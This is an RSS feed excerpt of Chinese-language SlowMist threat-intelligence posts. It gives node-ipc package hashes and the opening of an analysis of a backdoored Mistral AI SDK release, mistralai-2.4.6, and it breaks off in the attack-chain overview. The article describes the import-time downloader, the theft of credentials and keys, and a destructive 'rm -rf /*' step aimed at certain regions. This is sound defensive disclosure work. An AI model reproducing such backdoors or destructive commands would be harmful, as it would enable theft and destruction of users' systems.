bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: f5970a9774a22a863728b960543f68e7009099ef</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 449e4265979b5fdb2d3446c021af437e815debd66de7da2fe54f1ad93cbcc75e</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: node-ipc-9.2.3.tgz</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: 58ae7338960ef525d7c655023d7c81e3ddb283d6</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: c2f4dc64aec4631540a568e88932b61daebbfb7e8281b812fa01b7215f9be9ea</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: node-ipc-12.0.1.tgz</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: fe5d107b9d285327af579259a32977c4f475fa26</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 78a82d93b4f580835f5823b85a3d9ee1f03a15ee6f0e01b4eac86252a7002981</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: node-ipc.cjs</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MD5: d1ba0419cb5e5de91b9b58e87b8322e1</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: ab7388363936bf527afd4173b5728c7cdbdd01ab</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 96097e0612d9575cb133021017fb1a5c68a03b60f9f3d24ebdc0e628d9034144</span></span></p></b></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504946&amp;idx=1&amp;sn=7904df2118a2c618557db8bdd810f2b6&amp;scene=21#wechat_redirect" textvalue="被黑分析 | ShapeShift FOX Colony 授权信任链缺陷" data-itemshowtype="0" linktype="text" data-linktype="2">被黑分析 | ShapeShift FOX Colony 授权信任链缺陷</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590&amp;scene=21#wechat_redirect" textvalue="Shai-Hulud 恶意软件深度剖析：开源即失控 ？" data-itemshowtype="0" linktype="text" data-linktype="2">Shai-Hulud 恶意软件深度剖析：开源即失控 ？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=1&amp;sn=6452ec12fb825b3a0b91ca5be8f009d8&amp;scene=21#wechat_redirect" textvalue="MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线" data-itemshowtype="0" linktype="text" data-linktype="2">MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=2&amp;sn=476c39eb63c7323cc18604a3ccc5d487&amp;scene=21#wechat_redirect" textvalue="威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析" data-itemshowtype="0" linktype="text" data-linktype="2">威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1866fe72&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247505005%26idx%3D1%26sn%3Dd99d7f743d73c3f53f24b1cd2d71ddbf">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 15 May 2026 19:50:00 +0800</pubDate>
    </item>
    <item>
      <title>威胁情报｜Mistral AI 官方 SDK 供应链投毒分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247505005&amp;idx=2&amp;sn=b921a0eaa914c68c5b819df6b2af116d</link>
      <description>本次捕获的 mistralai-2.4.6 攻击事件是一起由同一攻击团伙精心构造的、横跨 PyPI 和 NPM 两大生态的复合供应链投毒活动的一个分支。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-15 19:50</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5cd98af5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCI0MfuCaPCKT3ib2O1licZIKGqtkxqQ9z7O0MAyiaMictO1UOJZGptX3tuia4LgI1wNhcAyreNp0X0uu0HQhicJibeQavGxcbXowicib3o8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本次捕获的 mistralai-2.4.6 攻击事件是一起由同一攻击团伙精心构造的、横跨 PyPI 和 NPM 两大生态的复合供应链投毒活动的一个分支。</p>
  <p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p data-pm-slice="9 9 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></h1><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">近日，MistEye 安全监控系统在对 PyPI 生态进行持续威胁狩猎时，捕获到 Mistral AI 官方 Python SDK 的恶意版本 mistralai-2.4.6。经深入分析，该样本</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">并非攻击者伪造的仿冒包</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">——用户从 PyPI 安装的确实是 mistralai 官方名下的版本，只是源码中已被植入后门。结合带毒包的可信发布形态、与 Shai-Hulud 的关联特征以及外部公开溯源信息，攻击者</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">高度疑似</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通过入侵项目发布链路将恶意代码混入了正式版本。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该样本与此前慢雾安全团队披露的 Shai-Hulud 供应链投毒攻击（详见</span><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590&amp;scene=21#wechat_redirect" textvalue="《Shai-Hulud 恶意软件深度剖析：开源即失控 ？》" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">《Shai-Hulud 恶意软件深度剖析：开源即失控 ？》</span></a><span textstyle="" style="font-weight: normal;">）存在直接关联——两个恶意框架使用了</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完全相同的 4096-bit RSA 公钥</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">加密窃取数据，这是将二者归因至同一攻击团伙的强关联证据。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">简单来说，攻击者黑入了正版 SDK 的发布链路，在 import 入口处埋了一段不到 30 行的恶意代码后照常发布。用户只要按官方文档写下 from mistralai.client import Mistral，恶意代码就会在后台静默运行：先从攻击者服务器下载一个伪装成机器学习工具的远控程序 transformers.pyz，再由该远控程序系统性搜集受害主机上的云凭据、SSH 密钥、CI/CD Token、密码管理器数据等上百类敏感信息，加密后传回攻击者手中。更危险的是，如果受害主机位于以色列或伊朗地区，远控程序还会以 1/6 的概率执行 rm -rf /*，直接摧毁整个系统。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">受影响环境包括 Linux 开发机、CI/CD 流水线、容器化环境、后端服务器以及 AI/ML 训练集群。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">MistEye 安全团队对该恶意包的全部源码（一阶段 79+ 个文件，二阶段 14 个文件）进行了完整的逐行分析，并对 Shai-Hulud 样本做了关联比对，以下为详细分析结果。</span></p></b><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">MistEye 响应</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 是由 SlowMist 自主研发的 Web3 威胁情报与动态安全监控系统，集成了安全监控与情报聚合能力，为用户提供实时的风险预警与资产守护。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在捕获本次 Mistral AI SDK 遭入侵的恶意版本后，MistEye 系统已触发高危告警并对整条攻击链进行了完整还原。通过对恶意包源码和后续远控程序的逐行分析，我们定位了隐藏在主入口的恶意下载器，提取了攻击者服务器的 IP 地址和文件路径等关键情报，并在拿到远控程序样本后进一步分析了其窃密、破坏和持久化等完整功能。相关情报已向客户推送高危告警。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.572405929304447" data-type="png" data-w="877" height="463" style="margin-left: 0px;margin-top: 0px;" width="809" data-imgfileid="100021299" src="https://wechat2rss.xlab.app/img-proxy/?k=ed3c107a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLwgmR2EKick0kKRHljtiaCjzOZyqhBqicDRGib1nXOju55iahibQjPYZYIOIwgGKq3H1Cdq3CiaosOar0f3Bc1A3okp7XwdSyloic5F34%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">攻击链条总览</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在深入分析代码之前，先大概讲解一下整条攻击链的四个环节：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">埋入入口</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> → </span></span><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者将恶意代码混入正版 SDK 的 `import` 